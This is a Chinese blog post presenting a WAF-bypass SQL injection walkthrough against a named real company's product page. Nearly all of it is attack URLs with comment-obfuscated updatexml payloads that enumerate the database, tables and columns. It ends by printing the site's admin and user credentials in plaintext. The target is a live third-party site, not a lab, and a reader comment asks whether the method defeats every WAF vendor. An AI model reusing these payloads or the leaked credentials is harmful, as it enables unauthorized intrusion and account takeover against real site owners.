正在阅读:

WAF绕过实例练习

7,501

注入点:

http://www.iluminacionestriac.com/ver-producto.php?id=12

1、判断存在注入:

http://www.iluminacionestriac.com/ver-producto.php?id=12-0

http://www.iluminacionestriac.com/ver-producto.php?id=12-1

返回不同,存在注入

2、字段长度:

http://www.iluminacionestriac.com/ver-producto.php?id=12 order by 5 正常

http://www.iluminacionestriac.com/ver-producto.php?id=12 order by 6 错误

长度为5

3、数据库名称:

http://www.iluminacionestriac.com/ver-producto.php?id=a()

Database query failed: FUNCTION iluminac_portal.a does not exist

数据库名称为:iluminac_portal

4、数据库版本号:

http://www.iluminacionestriac.com/ver-producto.php?id=12 and updatexml(1,/*!%0aconcat*/(0x7e,(/*!%0aSelEcT*/ version()),0x7e),1)

版本为:5.5.23-55

5、数据库用户名:

http://www.iluminacionestriac.com/ver-producto.php?id=12 and updatexml(1,/*!%0aconcat*/(0x7e,(/*!%0aSelEcT*/ user()),0x7e),1)

用户名为:iluminac_triac@localhost

6、暴库:

http://www.iluminacionestriac.com/ver-producto.php?id=12 and updatexml(1,/*!%0aconcat*/(0x7e,(/*!%0aSelEcT*/schema_name /*!%0afrom*/ information_schema.schemata LIMIT 1,1),0x7e),1)

名称:iluminac_portal

7、暴表:

http://www.iluminacionestriac.com/ver-producto.php?id=12 and updatexml(1,/*!%0aconcat*/(0x7e,(/*!%0aSelEcT*/table_name /*!%0afrom*/ information_schema./*!%0ctables*/ where table_schema=0x696C756D696E61635F706F7274616C LIMIT 9,1),0x7e),1)

名称:archivos,categorias,fotos,general,noticias,paginas,productos,secciones,sef,users,videos

8、暴字段:

http://www.iluminacionestriac.com/ver-producto.php?id=12 and updatexml(1,/*!%0aconcat*/(0x7e,(/*!%0aSelEcT*/column_name /*!%0afrom*/ information_schema.columns where table_name='users' LIMIT 0,1),0x7e),1)
结果:id,username,password,nombre,apellidos,email

9、用户名和密码:

http://www.iluminacionestriac.com/ver-producto.php?id=12 and updatexml(1,/*!%0aconcat*/(0x7e,(/*!%0aSelEcT*//*!%0aconcat*/(username,0x3a,password) from users limit 0,1),0x7e),1)

结果:

admin:solnet

usuario:753951

目前有:1条访客评论,博主回复1

  1. saberask
    2013-11-07 11:09

    这个方法能绕过所有waf厂商吗?

留下脚印,证明你来过。

*

*

流汗坏笑撇嘴大兵流泪发呆抠鼻吓到偷笑得意呲牙亲亲疑问调皮可爱白眼难过愤怒惊讶鼓掌